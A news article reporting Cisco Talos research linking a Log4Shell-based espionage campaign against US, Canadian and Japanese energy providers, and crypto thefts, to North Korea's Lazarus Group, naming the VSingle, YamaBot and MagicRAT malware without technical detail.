Share this article on:
A new cyber espionage campaign targeting US, Canadian and Japanese energy providers has been linked to Lazarus, a North Korean state-sponsored hacking group.
Hacking group Lazarus, also known as APT38, has been observed targeting unnamed energy providers in the United States, Canada and Japan between February and July this year according to Cisco Talos.
The hackers used a year-old vulnerability in Log4j, known as Log4Shell, to compromise internet-exposed VMware Horizon servers to establish an initial foothold onto a victim's enterprise network, according to Cisco's research, before deploying bespoke malware known as “VSingle” and “YamaBot” to establish long-term persistent access.
Japan's national cyber emergency response team, known as CERT, has recently attributed YamaBot to Lazarus APT.
Symantec revealed the details of this espionage campaign in April this year. The Symantec team attributed the operation to "Stonefly", another North Korean hacking group that sometimes overlaps with Lazarus.
Cisco Talos also observed a previously unknown remote access Trojan — or RAT — named "MagicRAT", attributed to Lazarus Group, which the hackers use for reconnaissance and stealing credentials.
According to Cisco Talos security researchers Jung soo An, Asheer Malhotra and Vitor Ventura, the main goal of these attacks was likely to establish long-term access into victim networks in order to conduct espionage operations in support of North Korean government objectives.
"This activity aligns with historical Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property," Cisco Talos researchers said.
The Lazarus Group is a financially motivated hacking group backed by the North Korean state that is driven by efforts to support North Korea's state objectives, including military research and development and evasion of international sanctions.
In recent months, the hacking group turned its attention to blockchain and cryptocurrency organisations.
It has been linked to the recent theft of $100 million in crypto assets from Harmony’s Horizon Bridge, and the theft of $625 million in cryptocurrency from the Ronin Network, an Ethereum-based sidechain made for the popular play-to-earn game Axie Infinity.
The Cisco Talos researchers added that Pyongyang has long used stolen cryptocurrency and the theft of other information to fund its nuclear weapons program.
The US government offered a $10 million reward for information on members of state-sponsored North Korean threat groups in July, which included Lazarus, which is double the amount that the US State Department announced in April.
[Related: New EU cyber security rules drafted tipped to regulate IoT device market]